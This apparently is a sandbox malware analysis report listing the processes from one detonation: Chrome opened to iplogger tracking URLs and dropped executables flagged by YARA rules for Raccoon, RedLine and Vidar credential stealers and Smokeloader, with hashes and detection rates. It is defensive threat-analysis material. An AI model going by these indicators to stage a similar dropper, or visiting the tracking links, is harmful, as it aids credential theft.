                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000003.268213249.0000000004570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:18:25:53
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:18:25:53
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:18:25:54
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:18:25:55
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:18:25:55
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:18:25:56
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=1800,i,4002354000526200566,13683174315975428069,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:18:25:56
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:18:25:57
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1780,i,2243672671988617880,5445177111515229420,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:18:25:57
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:12
                                                                                                                                                                      Start time:18:25:58
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:13
                                                                                                                                                                      Start time:18:26:04
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:18:26:05
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:347136 bytes
                                                                                                                                                                      MD5 hash:501E0F6FA90340E3D7FF26F276CD582E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.462192627.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.308958287.0000000000713000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.390750632.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.357431228.0000000000710000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000003.304422809.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000E.00000002.459641391.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000E.00000002.459641391.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 64%, Metadefender, Browse
                                                                                                                                                                      • Detection: 96%, ReversingLabs

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:18:26:06
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:775168 bytes
                                                                                                                                                                      MD5 hash:3EC059BD19D6655BA83AE1E644B80510
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 44%, ReversingLabs

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:18:26:06
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1828,i,6770499846379427692,11301094581731792919,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:19
                                                                                                                                                                      Start time:18:26:09
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1808,i,14561123893253289643,1012939592416384631,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:18:26:09
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
                                                                                                                                                                      Imagebase:0xd30000
                                                                                                                                                                      File size:109568 bytes
                                                                                                                                                                      MD5 hash:BBD8EA73B7626E0CA5B91D355DF39B7F
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 88%, ReversingLabs

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:18:26:10
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\real.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\real.exe"
                                                                                                                                                                      Imagebase:0x1230000
                                                                                                                                                                      File size:290304 bytes
                                                                                                                                                                      MD5 hash:E0C8728412F5F7E97698C72DA925C5E6
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000016.00000002.415807819.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000016.00000000.310875811.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:18:26:11
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\safert44.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\safert44.exe"
                                                                                                                                                                      Imagebase:0x420000
                                                                                                                                                                      File size:251904 bytes
                                                                                                                                                                      MD5 hash:414FFD7094C0F50662FFA508CA43B7D0
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000017.00000000.313593133.0000000000422000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: ditekSHen
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 80%, ReversingLabs

                                                                                                                                                                      Target ID:24
                                                                                                                                                                      Start time:18:26:12
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1712,i,17276114921128893629,13810006438660092211,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:25
                                                                                                                                                                      Start time:18:26:12
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\jshainx.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
                                                                                                                                                                      Imagebase:0x220000
                                                                                                                                                                      File size:109568 bytes
                                                                                                                                                                      MD5 hash:2647A5BE31A41A39BF2497125018DBCE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: ditekSHen
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 46%, Metadefender, Browse
                                                                                                                                                                      • Detection: 100%, ReversingLabs

                                                                                                                                                                      Target ID:26
                                                                                                                                                                      Start time:18:26:13
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\brokerius.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\brokerius.exe"
                                                                                                                                                                      Imagebase:0x30000
                                                                                                                                                                      File size:290304 bytes
                                                                                                                                                                      MD5 hash:F5D13E361F8B9ACA7103CB46B441034B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.592193396.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 58%, ReversingLabs

                                                                                                                                                                      Target ID:27
                                                                                                                                                                      Start time:18:26:13
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1732,i,11424558033472135501,3208527025666120732,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:28
                                                                                                                                                                      Start time:18:26:15
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\captain09876.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\captain09876.exe"
                                                                                                                                                                      Imagebase:0x7ff7e2d90000
                                                                                                                                                                      File size:721408 bytes
                                                                                                                                                                      MD5 hash:CE94CE7DE8279ECF9519B12F124543C3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 37%, Metadefender, Browse
                                                                                                                                                                      • Detection: 38%, ReversingLabs

